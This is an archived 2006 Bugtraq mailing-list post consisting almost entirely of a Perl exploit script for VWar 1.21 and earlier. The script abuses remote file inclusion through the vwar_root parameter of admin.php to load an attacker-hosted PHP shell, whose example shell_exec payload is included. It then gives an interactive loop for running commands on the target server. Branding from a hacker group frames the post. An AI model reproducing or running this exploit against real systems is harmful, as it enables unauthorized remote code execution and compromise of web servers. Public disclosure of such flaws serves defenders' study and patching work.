lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 22 Apr 2006 15:48:59 -0000
From: ali@...kerz.ir
To: bugtraq@...urityfocus.com
Subject: VWar <= ver 1.21 Remote Code Execution Exploit


#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx ,sattar.li , stanic, mfox,blood moon and..
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
######################################################
# VWar <= ver 1.21 Remote Code Execution Exploit     #
# usage: >>>>                                        #
# perl vwar.pl +location of VWar+ +shell Url+        #
# location example :http://raeget/modules/vwar/admin #
# cmd shell example: <?shell_exec($_GET[cmd]);?>     #
######################################################
use LWP::Simple;

print "-------------------------------------------\n";
print "=       vwar Exploit BY s3rv3r_hack3r     =\n";
print "=          IHST (WwW.hackerz.ir)          =\n";
print"-------------------------------------------\n\n";

$targ = $ARGV[0];
$cmdurl = $ARGV[1];

   $con=get("http://".$targ) || die "[-]Cannot connect to Host";
while ()
{

     print "Cmd@...T |\$";
     chomp($cmd=<STDIN>);


$commd=get("http://".$targ."/admin.php?vwar_root=".$cmdurl."&cmd=".$cmd)
}


Powered by blists - more mailing lists